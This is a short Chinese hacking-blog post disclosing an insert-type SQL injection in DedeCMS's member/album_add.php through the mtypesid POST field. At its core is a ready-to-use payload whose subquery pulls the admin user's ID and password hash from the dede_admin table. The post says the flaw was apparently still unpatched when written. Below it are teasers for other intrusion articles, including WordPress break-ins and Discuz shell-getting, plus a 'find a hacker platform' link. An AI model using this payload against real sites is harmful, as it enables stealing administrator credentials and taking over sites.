Dedecms某一处insert型注入

hacker5年前 (2020-05-31)黑客文章736

Dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的，目前最新版本应该是没修复的
漏洞需要会员，所以比较鸡肋啦!
发表文章处，post表单的mtypesid可以注入

/dedecmsnew/member/album_add.php

注入的代码：

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',

'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

标签: 黑客技术

返回列表

什么叫Ntop？ Ntop是互联网检测专用工具，由网络信息安全技术专业工作人员用于显示信息互联网应用状况。当放置“互动方式”时，ntop将在终端用户的终端设备上显示信息网络状态。假如置放在“Web方...

怎么学习黑客技术 1、参与CTF比赛 CTF比赛是黑客学习和提高技能的重要途径，初学者可以参加一些入门级别的CTF比赛，挑战自己的技能，并从比赛中学习经验和技巧。2、必须保持学徒的心：一个真正的大师永...

什么叫GDB？ GDB或GNU Project程序调试是一种网络信息安全数据加密/黑客工具，容许客户在运作时在网络技术应用程序流程或程序流程（手机软件）中开展财务审计和发觉。GDB针对开发者或程序猿...

黑客技术（想要学黑客技术）小编在头条陆陆续续发布了不少关于黑客的视频，很多对网络安全感兴趣的网友私信我，说想要学习黑客技术。这里面多数人都是纯小白，在大家的认知中，学习黑客就是学会用那些黑客工具，而忽...

ＷＰ程序，广受国内外站长们的喜爱，也因此，ＷＰ程序的安全也是一直以来做的不错的，说到入侵ＷＰ博客，小菜也没经验，完全是找了些这类的文章看了下，然后自己在琢磨点思路，所以还请看官们勿喷呐～１...

之前写的几个后台拿shell，Discuz!忽略了，但新版本Discuz! X3.1 Release 20140301实际上有所加强，但是真的修复了之前提到的问题吗？ Discuz!大概做了下面几...

找黑客平台